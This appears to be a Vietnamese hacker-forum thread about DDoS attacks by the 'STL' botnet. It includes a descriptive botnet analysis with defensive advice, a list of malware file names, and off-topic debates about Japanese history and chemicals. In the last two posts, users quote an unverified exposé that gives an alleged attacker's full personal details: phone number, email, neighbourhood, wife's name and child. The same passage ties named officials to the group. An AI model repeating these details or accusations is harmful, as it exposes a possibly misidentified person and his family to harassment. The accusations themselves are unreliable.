chỉ nói cho sướng miệng. Một cái mang tính tích cực, một cái mang tính tiêu cực. Tích cực ở chỗ nó đưa ra (ít ra) một hướng để giải quyết. Tiêu cực ở chỗ nó không đưa ra hướng giải quyết. Nên trân trọng những phê bình tích cực và nên dẹp bỏ thói quen tự ái khi đứng trước sự phê bình. Điều buồn cười hơn nữa, "chính trị" là thứ cấm kỵ nhưng khối người thích dùng "chính trị" để gán ghép cho việc phê bình. Hầu hết các phê bình về hiện trạng xã hội, kinh tế, văn hoá, khoa học, kỹ thuật, đời sống...v...v... đều bị ép vô cái khuôn chính trị để kết tử nó bằng lăng kính chính trị: phản động và không phản động. Tư duy con người không nên đơn giản và hạn hẹp như vậy. Thôi nhá bà con. Tốt nhất là không nên nói chuyện "chính trị" cho đến khi nào tư duy được hình thành vững vàng.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

Cám ơn ý kiến thông minh của conmale. ----------- Hì hì đây lai là vấn đề "chữ nghĩa" Thưc tế luôn đa dang, phong phú và phức tạp, nên không một câu chữ nào thâu tóm hết nôi dung đầy đủ của nó. Thành thử có thể cùng một câu chữ, mà người nay hiểu thế này, người khác hiểu thế kia. "Đi tắt" thì đúng là phải đi theo con đường ngắn nhất và phải đi đúng đường rồi. Còn "đón đầu" có nghĩa là ta phải đến đúng chỗ họ đang đứng . Nhưng cũng có nghĩa là phải đến mục tiêu trước họ hay đến điểm mà họ đang cố đi đến, cố hướng tới (mà họ chưa đến đươc), theo nghĩa mở rộng Thưc ra muốn đi tắt đón đón đầu trong công nghệ trước hết phải hiểu rất kỹ công nghệ mà người ta đang áp dụng, phải tìm hiểu thêm các kiến thức khác và cũng phải có những yếu tố sáng tao (innovation) nữa. Nếu không cũng không thể đón đầu được. Tai sao như vậy? Vì áp dung một công nghệ mới đã định hình vào hoàn cảnh VN hay hoàn cảnh một công ty, muốn thành công phải có yếu tố sáng tạo. Nếu không chắc chắn sẽ thất bại. Thành thử các yếu tố bắt chước và sáng tạo đan xen vào với nhau

Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi — GMT

@PXMMRF : thông qua những gì anh tâm tình qua những bài viết, em thêm nể phục anh PXMMRF vì ngoài là một chuyên gia hoá học, một nhà kinh doanh chèo lái con thuyền công ty, tạo công ăn việc làm cho mọi người; còn là một IT master nữa . quả thật đáng khâm phục biết bao . em cũng đang bán các mặt hàng hoá chất cơ bản và các hoá chất đặc biết cho các ngành công nghiệp mía đường, ethanol, giấy, plastic. không biết anh và công ty có nhu cầu mua không ạ. em sẽ sent qoutation ngay mà. giá okie luôn. em bán hàng dạo, rồi bán hoá chất, giờ lại muốn làm IT em chẳng biết em sẽ đi về đâu buồn quá cơ . :(( xin các anh em chỉ giáo cho ạ .

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

kutruoi wrote:

@PXMMRF : thông qua những gì anh tâm tình qua những bài viết, em thêm nể phục anh PXMMRF vì ngoài là một chuyên gia hoá học, một nhà kinh doanh chèo lái con thuyền công ty, tạo công ăn việc làm cho mọi người; còn là một IT master nữa . quả thật đáng khâm phục biết bao . em cũng đang bán các mặt hàng hoá chất cơ bản và các hoá chất đặc biết cho các ngành công nghiệp mía đường, ethanol, giấy, plastic. không biết anh và công ty có nhu cầu mua không ạ. em sẽ sent qoutation ngay mà. giá okie luôn. em bán hàng dạo, rồi bán hoá chất, giờ lại muốn làm IT em chẳng biết em sẽ đi về đâu buồn quá cơ . :(( xin các anh em chỉ giáo cho ạ .

Nhất trí thôi! Em cứ send your best quotation đến đi nhé ( Đừng viết là "sẽ sent qoutation" đấy, hì hì). Chủ yêu là các hoá chất dùng cho Latex cao su thiên nhiên và cao su khô (chemicals for natural rubber latex and dry rubber). Sẽ liên hệ qua email sau.

Phân tích tính chất vài trận DDoS HVA vừa qua.

raulgonzalez — GMT

Em em nghĩ thì "đi tắt đón đầu" cần hiểu theo nghĩa: phát triển thẳng các ngành nghề công nghệ cao nếu có thể. Vd: ưu tiên phát triển CNTT thay vì ưu tiên phát triển nông nghiệp. Cấp phép cho Intel chế tạo chip (không nhất thiết phải là cty VN, miễn là trong lãnh thổ VN). Hoặc chế tạo máy mà không nhất thiết phải phát triển luyện kim trước (nhập). Các bác IT gọi là don't reinvent the wheel. Không nên hiểu đi tắt đón đầu là đốt cháy giai đoạn. Về STL, quả thực nếu liên hệ với phát biểu của bác Triều thì khó có thể không nghi ngờ nguồn gốc STL là từ CAM.

Phân tích tính chất vài trận DDoS HVA vừa qua.

smile_sad — GMT

Theo ý kiến riêng của cá nhân mình, việc xác định STL là ai, STL do ai đứng đằng sau, chúng ta cần dũng cảm như thế này:

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

@anh Conmale Thế anh không thấy là muốn improve các thứ kia như hiện trạng xã hội, kinh tế, văn hoá, khoa học, kỹ thuật, đời sống...v...v... thì về mặt bản chất phải thay đổi cái gì ah?

Phân tích tính chất vài trận DDoS HVA vừa qua.

tranvanminh — GMT

rongchaua wrote:

Thế anh PXMMRF nghĩ trước thế chiến thứ 2 Nhật nó thua công nghệ Mỹ xa lắm sao??? Em nghĩ anh nên xem lại vấn đề này kỹ hơn

Mình không có nhiều thời gian ngồi phân tích, nhưng mà mình khẳng định với bạn là, bạn nhìn nhận lịch sử của Nhật sai rồi. 1. Trước 1868, chính sách mạc là bế môn toả cảng, không thương mại,giao dịch với bất cứ nước nào. 2. Sau 1868, tức là sau Minh trị duy tân, thì mới bắt đầu đưa các Samurai của Nhật qua Pháp, Đức học. Bởi vậy, cho đến đệ nhị thế chiến, tuy Nhật đánh thắng các nước châu á nhưng về quân sự, kỹ thuật, tài nguyên, đều thua xa đồng minh Hoa kỳ, và phải nói là rất xa, cho nên, anh PXM nói như vậy là hoàn toàn chính xác.

Phân tích tính chất vài trận DDoS HVA vừa qua.

elt0m — GMT

Em có một câu hỏi lạc đề liên quan đến | 26 chữ vàng | Tại sao ông bạn vàng Trung Quốc không có điện chúc mừng Quốc Khánh nước ta 2-9 vừa rồi! Xem thêm: http://quechoa.info/2011/09/13/bao-nhan-dan-noi-h%E1%BA%B3n-hoi-d%E1%BA%A5y/ Theo em: STL= DDOS + ăn cắp + lừa đảo + hack + phá hoại + bạn vàng ====>>>> dân tộc lâm nguy Có lẽ các ông bạn vàng kia + lũ rác rưởi STL đã có câu trả lời rồi nhỉ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

texudo wrote:

@anh Conmale Thế anh không thấy là muốn improve các thứ kia như hiện trạng xã hội, kinh tế, văn hoá, khoa học, kỹ thuật, đời sống...v...v... thì về mặt bản chất phải thay đổi cái gì ah?

Nói ngắn gọn: thay đổi tư duy. Nói dài hơn một tí nữa: thay đổi tư duy trong việc nhìn nhận vấn đề, biết tôn trọng lẽ phải, biết trung thực, biết nhận cái sai cái kém và phát huy cái mạnh, cái ưu việt. Đi sâu vào thực chất và bài trừ những thứ bề ngoài, những thành tích ảo. Tóm lại: muốn phát triển, muốn vươn tới những cái tốt đẹp thì phải biết dũng cảm nhìn thẳng vào thực chất vấn đề, đừng khoả lấp, đừng che đậy, đừng bám víu vào những thứ "niềm tin" mơ hồ. Dùng cái trí, cái dũng, cái đức để sống và sống cho có ý nghĩa chớ không phải sống vì bề ngoài và vì sỉ diện. Mỗi con người cần ý thức giá trị cũng như trách nhiệm của mình trong xã hội.

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

tranvanminh wrote:

rongchaua wrote:

Thế anh PXMMRF nghĩ trước thế chiến thứ 2 Nhật nó thua công nghệ Mỹ xa lắm sao??? Em nghĩ anh nên xem lại vấn đề này kỹ hơn
Mình không có nhiều thời gian ngồi phân tích, nhưng mà mình khẳng định với bạn là, bạn nhìn nhận lịch sử của Nhật sai rồi. 1. Trước 1868, chính sách mạc là bế môn toả cảng, không thương mại,giao dịch với bất cứ nước nào. 2. Sau 1868, tức là sau Minh trị duy tân, thì mới bắt đầu đưa các Samurai của Nhật qua Pháp, Đức học. Bởi vậy, cho đến đệ nhị thế chiến, tuy Nhật đánh thắng các nước châu á nhưng về quân sự, kỹ thuật, tài nguyên, đều thua xa đồng minh Hoa kỳ, và phải nói là rất xa, cho nên, anh PXM nói như vậy là hoàn toàn chính xác.

Mình nghĩ là bồ nhầm rồi, trước và trong chiến tranh thế giới thứ 2 nước Nhật cực kỳ phát triền. Có thể nói là đứng đầu Châu Á. Nếu không có Mỹ can thiệp, thì Nhật sẽ chiếm lĩnh toàn bộ Đông Châu Á, cho tới tận nước Úc xa xôi, bạn thấy đấy với một nước mà có thể chiếm đóng các quốc gia khác trên một diện tích rộng lớn như vậy thì bạn phải biết họ đã nằm ở đâu trên con đường phát triển. Bạn đã bao giờ tự hỏi tại sao Hawai xa xôi là thế mà Nhật Bản đánh cho Mỹ một vố đau ở trận Trân Châu Cảng không? Khi đấy Nhật Bản đã có xe tăng, máy bay, tàu chiến ....

Phân tích tính chất vài trận DDoS HVA vừa qua.

vndncn — GMT

Dù cách viết của kutruoi có hơi lung tung, lan man nhưng về ý chính tôi vẫn đồng ý với quan điểm của bài post #932. Còn ai cảm thấy không chấp nhận được thì hãy đọc bài này http://www.gocnhinalan.com/Details.aspx?id=97 rồi suy nghĩ. Hãy đọc và suy nghĩ.

Liên kết hồi sáng có nội dung để đọc, giờ mất tiêu rồi. Không hiểu vì sao ???

Phân tích tính chất vài trận DDoS HVA vừa qua.

tranvanminh — GMT

texudo wrote:

tranvanminh wrote:

rongchaua wrote:

Thế anh PXMMRF nghĩ trước thế chiến thứ 2 Nhật nó thua công nghệ Mỹ xa lắm sao??? Em nghĩ anh nên xem lại vấn đề này kỹ hơn
Mình không có nhiều thời gian ngồi phân tích, nhưng mà mình khẳng định với bạn là, bạn nhìn nhận lịch sử của Nhật sai rồi. 1. Trước 1868, chính sách mạc là bế môn toả cảng, không thương mại,giao dịch với bất cứ nước nào. 2. Sau 1868, tức là sau Minh trị duy tân, thì mới bắt đầu đưa các Samurai của Nhật qua Pháp, Đức học. Bởi vậy, cho đến đệ nhị thế chiến, tuy Nhật đánh thắng các nước châu á nhưng về quân sự, kỹ thuật, tài nguyên, đều thua xa đồng minh Hoa kỳ, và phải nói là rất xa, cho nên, anh PXM nói như vậy là hoàn toàn chính xác.
Mình nghĩ là bồ nhầm rồi, trước và trong chiến tranh thế giới thứ 2 nước Nhật cực kỳ phát triền. Có thể nói là đứng đầu Châu Á. Nếu không có Mỹ can thiệp, thì Nhật sẽ chiếm lĩnh toàn bộ Đông Châu Á, cho tới tận nước Úc xa xôi, bạn thấy đấy với một nước mà có thể chiếm đóng các quốc gia khác trên một diện tích rộng lớn như vậy thì bạn phải biết họ đã nằm ở đâu trên con đường phát triển. Bạn đã bao giờ tự hỏi tại sao Hawai xa xôi là thế mà Nhật Bản đánh cho Mỹ một vố đau ở trận Trân Châu Cảng không? Khi đấy Nhật Bản đã có xe tăng, máy bay, tàu chiến ....

Mình không so sánh Nhật và châu Á, mình đang so sánh Hoa Kỳ và Nhật ai phát triển hơn ai, bạn đọc kỹ lại giùm, tiện thể hỏi bạn vài câu, - Nếu Nhật phát triển hơn Hoa Kỳ thì tại sao Hoa Kỳ lại chế tạo được bom nguyên tử trước Nhật và thế giới? - Mình đã tự hỏi nhiều lần tại sao Trân châu cảng xa xôi như vậy mà Nhật đánh được là bởi vì "Roosevelt　cho đánh"( mình nói có chứng cứ từ các tài liệu của Nhà trắng công bố trước đây vài năm). Ngoài ra, các cuộc chiến với Hoa Kỳ, Midway và Guadalcanal Nhật đều thua thảm bại, từ đó mới đúc kết được họ vốn thua Hoa kỳ về mọi mặt rất xa. - Nếu như Nhật tiến bộ như bạn nói thì tại sao bị Hoa Kỳ giải được hết các mật mã của Nhật dùng để truyền thông, triển khai chiến lược, rồi dẫn đến cái chết của đại tướng Yamamoto(Tổng tư lệnh hải quân đế quốc Nhật Bản)? - Nếu như Nhật tiến bộ hơn Mỹ thì tại sao Không quân Nhật bản lại dùng máy bay bằng gỗ của công ty Matsushita(Panasonic)? Rồi triển khai chiến dịch Kamikaze tàn khốc vậy để làm gì ? - Nếu như Hải quân của Nhật xịn hơn Mỹ thì tại sao chiến hạm Yamato bị vây đánh mà không thể trở tay trước không quân Hoa Kỳ ? - Và tóm lại, nếu như họ không thua gì Hoa Kỳ thì tại sao phải thảm bại với Hoa Kỳ ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

tranvanminh wrote:

texudo wrote:

tranvanminh wrote:

rongchaua wrote:

Thế anh PXMMRF nghĩ trước thế chiến thứ 2 Nhật nó thua công nghệ Mỹ xa lắm sao??? Em nghĩ anh nên xem lại vấn đề này kỹ hơn
Mình không có nhiều thời gian ngồi phân tích, nhưng mà mình khẳng định với bạn là, bạn nhìn nhận lịch sử của Nhật sai rồi. 1. Trước 1868, chính sách mạc là bế môn toả cảng, không thương mại,giao dịch với bất cứ nước nào. 2. Sau 1868, tức là sau Minh trị duy tân, thì mới bắt đầu đưa các Samurai của Nhật qua Pháp, Đức học. Bởi vậy, cho đến đệ nhị thế chiến, tuy Nhật đánh thắng các nước châu á nhưng về quân sự, kỹ thuật, tài nguyên, đều thua xa đồng minh Hoa kỳ, và phải nói là rất xa, cho nên, anh PXM nói như vậy là hoàn toàn chính xác.
Mình nghĩ là bồ nhầm rồi, trước và trong chiến tranh thế giới thứ 2 nước Nhật cực kỳ phát triền. Có thể nói là đứng đầu Châu Á. Nếu không có Mỹ can thiệp, thì Nhật sẽ chiếm lĩnh toàn bộ Đông Châu Á, cho tới tận nước Úc xa xôi, bạn thấy đấy với một nước mà có thể chiếm đóng các quốc gia khác trên một diện tích rộng lớn như vậy thì bạn phải biết họ đã nằm ở đâu trên con đường phát triển. Bạn đã bao giờ tự hỏi tại sao Hawai xa xôi là thế mà Nhật Bản đánh cho Mỹ một vố đau ở trận Trân Châu Cảng không? Khi đấy Nhật Bản đã có xe tăng, máy bay, tàu chiến ....
Mình không so sánh Nhật và châu Á, mình đang so sánh Hoa Kỳ và Nhật ai phát triển hơn ai, bạn đọc kỹ lại giùm, tiện thể hỏi bạn vài câu, - Nếu Nhật phát triển hơn Hoa Kỳ thì tại sao Hoa Kỳ lại chế tạo được bom nguyên tử trước Nhật và thế giới? - Mình đã tự hỏi nhiều lần tại sao Trân châu cảng xa xôi như vậy mà Nhật đánh được là bởi vì "Roosevelt　cho đánh"( mình nói có chứng cứ từ các tài liệu của Nhà trắng công bố trước đây vài năm). Ngoài ra, các cuộc chiến với Hoa Kỳ, Midway và Guadalcanal Nhật đều thua thảm bại, từ đó mới đúc kết được họ vốn thua Hoa kỳ về mọi mặt rất xa. - Nếu như Nhật tiến bộ như bạn nói thì tại sao bị Hoa Kỳ giải được hết các mật mã của Nhật dùng để truyền thông, triển khai chiến lược, rồi dẫn đến cái chết của đại tướng Yamamoto(Tổng tư lệnh hải quân đế quốc Nhật Bản)? - Nếu như Nhật tiến bộ hơn Mỹ thì tại sao Không quân Nhật bản lại dùng máy bay bằng gỗ của công ty Matsushita(Panasonic)? Rồi triển khai chiến dịch Kamikaze tàn khốc vậy để làm gì ? - Nếu như Hải quân của Nhật xịn hơn Mỹ thì tại sao chiến hạm Yamato bị vây đánh mà không thể trở tay trước không quân Hoa Kỳ ? - Và tóm lại, nếu như họ không thua gì Hoa Kỳ thì tại sao phải thảm bại với Hoa Kỳ ?

Nhật sau đệ nhị thế chiến không hơn Mỹ là cái chắc nhưng Nhật thời đó cũng là một cường quốc. Mỹ bị cú Trân Châu Cảng te tua đến độ quyết định chơi 2 trái bom nguyên tử xuống đất nước Nhật để nắm lại cán cân. Cái này là đòn chơi dứt điểm của Mỹ vì Mỹ dính với đồng minh ở Âu Châu đang đụng độ với Đức thời đó. Nhật không bằng Mỹ nhưng xét trọn bộ bối cảnh thế giới lúc đó, có bao nhiêu quốc gia có nền kỹ nghệ (hoá chất, hàng không, sản xuất... ) như Nhật? Anh nghĩ không ai nói là Nhật hơn Mỹ hết nhưng nói Nhật nghèo nàn lạc hậu và phải "đi tắt đón đầu" từ thời đầu thế kỷ 20 cho đến những thập niên sau đệ nhị thế chiến là không hoàn toàn chính xác.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Tổng kết tính chất botnet đã tấn công HVA trong vòng vài tháng qua. 1. Phát tán: Các zombies dùng để tấn công HVA đi qua hai đường chính: e-mail và web. Xuyên qua đường e-mail là các file đính kèm giả dạng .doc nhưng bản chất là các executables thường có tiêu đề và nội dung được soạn thảo sẵn tuỳ nhóm đối tượng được nhận. Hầu hết nạn nhân đều bị dính malware qua dạng này vì chủ quan hoặc cả tin hoặc thiếu kiến thức bảo mật. Xuyên qua đường web thường là các trang web phổ biến bị "owned" và chèn javascript để dẫn độc giả đến trang web độc hại. Nội dung của trang web độc hại thường có nội dung base64 encoded hoặc có javascript với các thủ thuật thông thường (như rotate và encode) để qua mặt những người không có kinh nghiêm bảo mật. Cho đến nay, cách ưa thích của dạng phát tán này là một java applet đơn giản dùng để "call" nội dung của một "parameter name" có trong nội dung trên trang web đi kèm với java applet. Đây là cách đơn giản để thực thi một vbs script được soạn sẵn và cũng nằm trong nội dung đi kèm trên trang web. Malware sử dụng cả hai phương tiện email và web đều thường giả mạo các binaries thông thường hoặc có sẵn trên máy của nạn nhân (ví dụ như binaries của Adobe, Sun, Intel, Apple....). Các malware thường tản rộng ra một hoặc nhiều dependencies nhằm giảm thiểu sự phát hiện của antiviruses trên máy. Đặc biệt cho đến nay, dạng malware mà stl sử dụng hoàn toàn là 32-bit Windows PE và chưa hề thấy có biến thái trên một hardware architecture nào khác. 2. Nhận lệnh: Zombies của stl nhận lệnh có trong payload được cài trong quá trình phát tán hoặc sau khi phát tán do một bộ phận khác của malware đảm nhận. Thông thường, các master-bots là những địa chỉ sử dụng dynamic DNS. Có lẽ đây là cách dễ lẫn vào mớ host muôn trùng hoặc dễ thay đổi IP thường xuyên hơn nếu bị phát hiện. Các master-bots cũng thường được sử dụng từ những nguồn khét tiếng dung dưỡng malware như "Santrex" và những hệ thống ở các nước ít chặt chẽ an ninh mạng. Thông tin zombies nhận được từ masters thường được mã hoá hoặc che đậy bằng một số hình thức và phương pháp ưa thích nhất là ấn định "User-agent" cụ thể cho phép zombies liên lạc (nhưng không cho phép người dùng bình thường truy cập). Nội dung lệnh thường là một chuỗi các giá trị "User-agent" khác nhau và một số biến đổi trong HTTP headers nhằm giúp zombies qua mặt được các hệ thống phòng thủ với biện pháp liên tục thay đổi "signature" (User-Agent và một số headers khác). 3. Tấn công: Zombies tấn công dồn dập hay chậm rãi tuỳ thuộc vào số lượng "thread" được ấn định cho mỗi zombie nhưng yếu tố quan trọng nhất là khả năng "crawl" như một search bot và lưu giữ giá trị sessions để tiếp tục crawl sâu vào bên trong. Những máy con bị biến thành zombie mà có cấu hình yếu thì sẽ bị trì trệ sau một khoảng thời gian ddos liên tục vào nạn nhân. Những đường dây kết nối Internet có băng thông kém thì sẽ bị chậm đáng kể. Ở phía nạn nhân, nếu không có biện pháp cản lọc đúng mức, hệ thống máy chủ sẽ ngưng hoạt động trong khoảng thời gian rất ngắn vì bị bão hoà đường truyền hoặc cạn kiệt tài nguyên. Bởi vì master-bots có thể ấn định nhiều mục tiêu tấn công cùng một lúc và nhiều URL khác cho nên zombies có thể chuyển hướng tấn công hoặc gia tăng biên độ tấn công. Master-bots có thể dễ dàng ước định số zombies được "sai khiến" và nguồn của các zombies từ đâu xuyên qua số truy cập đến máy chủ của master-bots để nhận chỉ thị. 4. Biến thái: Biến thái của dạng botnet này không nhiều. Với mô hình client / server này, biến thái ở cấp độ phát tán vẫn xoay quanh một số thủ thuật giả mạo binaries và một số biến thái lower level để qua mặt antiviruses trên phía máy con. Biến thái ở phía master-bots chỉ xoay quanh các tập mệnh lệnh được xào nấu nhưng không dùng motif mới. Botnet này phát huy được 3 yếu điểm để phát tán rộng rãi: a. Sự cả tin và thiếu kinh nghiệm của người dùng. b. Thói quen sử dụng máy với chủ quyền cao nhất. c. Thói quen tin tưởng vào antivirus mặc dù không cập nhật antivirus. 5. Cách khắc phục: Đối với người dùng bình thường: - Cài tường lửa cá nhân và lọc bỏ hết những tên miền cung cấp dynamic DNS. - Cài noscript trên trình duyệt và chỉ cho phép một số tên miền mình hoàn toàn tin tưởng được phép chạy javascript không bị kiểm soát. - Thường xuyên cập nhật antivirus. - Không cài software mình không tin tưởng hoặc từ nguồn không đáng tin cậy (lấy từ rapidshare và tương tự). - Không bấm "accept" trong khi duyệt web mà không kiểm tra kỹ lưỡng nguồn gởi hiển thị để "accept". - Không "double click" trên file đính kèm trên email. Kiểm tra kỹ nguồn IP và người gởi email trước khi nhận. - Block chuỗi IP của những quốc gia mình không viếng và các chuỗi IP của những data center khét tiếng dung dưỡng malware (google những thông tin này). Đối với người quản lý hệ thống bị tấn công: - Gia tăng băng thông. - Hình thành hệ thống cản lọc dựa trên số lần truy cập từ mỗi IP có những giá trị "User-agent" bị thay đổi liên tục. - Cản lọc những request có khả năng "crawl" mà không phải của google, yahoo hoặc một search engine nào đó mình thích dùng. - Mở rộng giải pháp load-balancer nếu có thể.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

"Không cài software mình tin tưởng", có lẽ anh conmale cần bổ sung làm rõ ý này ở phần cách khắc phục.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

bolzano_1989 wrote:

"Không cài software mình tin tưởng", có lẽ anh conmale cần bổ sung làm rõ ý này ở phần cách khắc phục.

hì hì, anh thiếu chữ "không". Đã chỉnh ở trên. Cám ơn em.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Người ta nói, tình cũ không rủ củng tới, quả là đúng thật ! Gần một năm rồi, em lại gặp bộ mèo què biến thể của mấy anh stl, bộ nằm vùng, ăn cắp thông tin ấy, đâu xa, trong máy laptop bà chị ruột thân yêu của mình luôn (Quá quắt !!!). Code y như Đao 360 ngày trước, cũng là bao nhiêu đó code, xào đi nấu lại, mạo danh tên khác. Bộ Đao 360 đó, em đã tạm gác lại vì phải theo các mẫu bot, DDOS tool của mấy anh trong một thời gian dài vừa qua. Hồi đó, secmask đã phân tích sơ bộ, rất hay và chính xác, nhưng chưa đủ 100%, vì chưa tìm ra điểm quan trọng, chính là cái host và phương thức mà các anh up thông tin của victim, dùng HTTP protocol về cái host đấy. Nhưng lần này thì không, em phải làm cho tới nơi tới chốn luôn ! Đâu nhiều đâu, 7-8 PE chứ mấy: Code:

1. Downloader.exe: quá nhiều nguồn lấy về, mấy cái tracker.cmd cùi bắp dùng wget của em cũng chụp được.
2. QTTask.exe
3. QTTask.dll
4. rfc2616.exe
4. drwtsn32.exe
5. c6to4.dll
6. cversions.2.db
7. DrWatson.dll
8. rdpuser.mof

Lần này, em chả công bố gì cả, buồn buồn thì móc ra, analysing 1 vài hàm cho vui, RCE đầy đủ, rõ ràng, chậm mà chắc, chả ai ép mình về tiến độ, thời gian, chất lượng, tính pháp lý của công việc cả ???!!! Thích thì làm, không thích thì thôi. Em quyết tìm ra đầy đủ lý do tại sao hồi đó em bị mất toàn bộ username, password ! StaticCaches.dat chỉ là một phần nhỏ, phải không mấy anh stl ? Hồi đó mấy anh nói em chỉ RCE được 40%, qua một thời gian dài vừa qua, em promote lên được bao nhiêu % rồi, mấy anh stl ? Bộ mà em đang RCE, em nói trước, các AVs đã nhận mẫu và IDA database rồi, không công bố, chỉ âm thầm cập nhật, phân tích, theo dõi. Các anh stl nên hy sinh nó đi là vừa, nói thật và chân thành đấy ! Làm gì thì làm, đừng có cài cắm trojan ăn cắp thông tin trên máy victim, là máy của mọi người dân lương thiện, hiền lành, vô tội của Viêt Nam là được rồi !

Phân tích tính chất vài trận DDoS HVA vừa qua.

songvedemdl — GMT

Em xin ngoài lề một tý: "Trong lĩnh vực cơ khí - tự động hóa, công trình "Dây chuyền sản xuất găng phẫu thuật y tế từ cao xu thiên nhiên" của KS Phạm Xuân Mai và cộng sự thuộc Công ty Cổ phần MERUFA đã đoạt Giải nhất. Đây là lần đầu tiên các nhà khoa học Việt Nam tự nghiên cứu, thiết kế, chế tạo và đưa vào sản xuất thành công dây chuyền tự động hóa, đồng bộ và hoàn chỉnh sản xuất găng mổ sử dụng nguyên liệu chính là cao su tự nhiên của Việt Nam, dây chuyền nói trên cho sản phẩm đoạt tiêu chuẩn quốc tế, giá rẻ hơn 30% so với giá găng nhập ngoại." nguồn http://environment-safety.com/news/data/2005_VIFOTEC.htm chúc anh PXMMRF thành công và có nhiều đóng góp hơn nữa cho xã hội ! hơn hẳn những người chỉ biết chỉ trích mà không (hoặc chưa) làm được gì thật sự có ích cho xã hội

Phân tích tính chất vài trận DDoS HVA vừa qua.

MoonyFall — GMT

Sinh tử lệnh là ai? Tất cả đã được bạch hóa đến mức khó ngờ. Tên thật của Sinh tử lệnh là Tuấn, sinh năm 1978 tại Quảng Nam. Y từng học qua trường THPT Hoàng Diệu tại Quảng Nam. Lên mạng, Tuấn có nick là tohoangvu. Tuấn hiện đang sống tại P.5 Quận 8, Saigon và làm việc ở Quận 1 dưới vỏ bọc là một nhà thiết kế. Số điện thoại liên lạc của Tuấn hiện nay, cho đến giờ phút này là 0932.060.268. Hộp thư chính để liên lạc cũng như để làm công việc thu lượm thông tin tấn công các nạn nhân, có địa chỉ là socidemo@yahoo.com.au. Tuấn kết hôn năm 2005 với một phụ nữ tên là Phan Thị Minh Thư, năm 2006 có đứa con gái đầu tiên, biệt danh là Chip. Tên thật của Sinh tử lệnh là Tuấn, sinh năm 1978 tại Quảng Nam. Y từng học qua trường THPT Hoàng Diệu tại Quảng Nam. Lên mạng, Tuấn có nick là tohoangvu. Tuấn hiện đang sống tại P.5 Quận 8, Saigon và làm việc ở Quận 1 dưới vỏ bọc là một nhà thiết kế. Từ cách thức của nhân vật bị lộ diện này, cho thấy, các nick xuất hiện trên mạng hay có đồng ý kiến nhưng cũng mang giọng điệu chửi bới cực đoan, rất có thể là công an mạng. Vì vậy, thận trong trong giao tiếp cho phép chat riêng và gửi mang kèm file... là những điều cần phải xét lại với những ai có chính kiến trên mạng. Tác giả TQN có khuyến cáo, cũng như nhiều chuyên viên tin học khác, rằng máy tính muốn thoát khỏi các vụ theo dõi, cướp hộp thư, blog... tốt nhất là nên hay thay đổi password, luôn cập nhật các chương trình rà soát virus trong máy. Thậm chí nếu cảm thấy không an tâm, cũng nên thay mới, cài lại các chương trình gõ chữ Việt, vốn có thể nhiễm virus và ghi lại các mật mã, chuyển tập tin đó cho các hacker của công an mạng. Sinh tử lệnh đã làm gì? Rất nhiều người cho rằng nhóm Sinh Tử lệnh này nằm dưới quyền của ông Lê Mạnh Hà, Giám đốc Sở Thông Tin Truyền Thông Saigon, có biệt hiệu là “thái tử”, vì ông ta vốn là con trai của nhà lãnh đạo cấp cao đầy quyền lực trong bóng tối, Lê Đức Anh. Một trong những hoạt động phôi thai nhưng không kém phần hiểm ác của nhóm này, được biết là vụ gài và bắt nhà dân chủ Trần Huỳnh Duy Thức vào năm 2009...

Nguồn: http://www.rfa.org/vietnamese/in_depth/hackers-work-vn-police-07082011100751.html Không biết những thông tin này thực hư thế nào

Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi — GMT

MoonyFall wrote:

Sinh tử lệnh là ai? Tất cả đã được bạch hóa đến mức khó ngờ. Tên thật của Sinh tử lệnh là Tuấn, sinh năm 1978 tại Quảng Nam. Y từng học qua trường THPT Hoàng Diệu tại Quảng Nam. Lên mạng, Tuấn có nick là tohoangvu. Tuấn hiện đang sống tại P.5 Quận 8, Saigon và làm việc ở Quận 1 dưới vỏ bọc là một nhà thiết kế. Số điện thoại liên lạc của Tuấn hiện nay, cho đến giờ phút này là 0932.060.268. Hộp thư chính để liên lạc cũng như để làm công việc thu lượm thông tin tấn công các nạn nhân, có địa chỉ là socidemo@yahoo.com.au. Tuấn kết hôn năm 2005 với một phụ nữ tên là Phan Thị Minh Thư, năm 2006 có đứa con gái đầu tiên, biệt danh là Chip. Tên thật của Sinh tử lệnh là Tuấn, sinh năm 1978 tại Quảng Nam. Y từng học qua trường THPT Hoàng Diệu tại Quảng Nam. Lên mạng, Tuấn có nick là tohoangvu. Tuấn hiện đang sống tại P.5 Quận 8, Saigon và làm việc ở Quận 1 dưới vỏ bọc là một nhà thiết kế. Từ cách thức của nhân vật bị lộ diện này, cho thấy, các nick xuất hiện trên mạng hay có đồng ý kiến nhưng cũng mang giọng điệu chửi bới cực đoan, rất có thể là công an mạng. Vì vậy, thận trong trong giao tiếp cho phép chat riêng và gửi mang kèm file... là những điều cần phải xét lại với những ai có chính kiến trên mạng. Tác giả TQN có khuyến cáo, cũng như nhiều chuyên viên tin học khác, rằng máy tính muốn thoát khỏi các vụ theo dõi, cướp hộp thư, blog... tốt nhất là nên hay thay đổi password, luôn cập nhật các chương trình rà soát virus trong máy. Thậm chí nếu cảm thấy không an tâm, cũng nên thay mới, cài lại các chương trình gõ chữ Việt, vốn có thể nhiễm virus và ghi lại các mật mã, chuyển tập tin đó cho các hacker của công an mạng. Sinh tử lệnh đã làm gì? Rất nhiều người cho rằng nhóm Sinh Tử lệnh này nằm dưới quyền của ông Lê Mạnh Hà, Giám đốc Sở Thông Tin Truyền Thông Saigon, có biệt hiệu là “thái tử”, vì ông ta vốn là con trai của nhà lãnh đạo cấp cao đầy quyền lực trong bóng tối, Lê Đức Anh. Một trong những hoạt động phôi thai nhưng không kém phần hiểm ác của nhóm này, được biết là vụ gài và bắt nhà dân chủ Trần Huỳnh Duy Thức vào năm 2009...
Nguồn: http://www.rfa.org/vietnamese/in_depth/hackers-work-vn-police-07082011100751.html Không biết những thông tin này thực hư thế nào

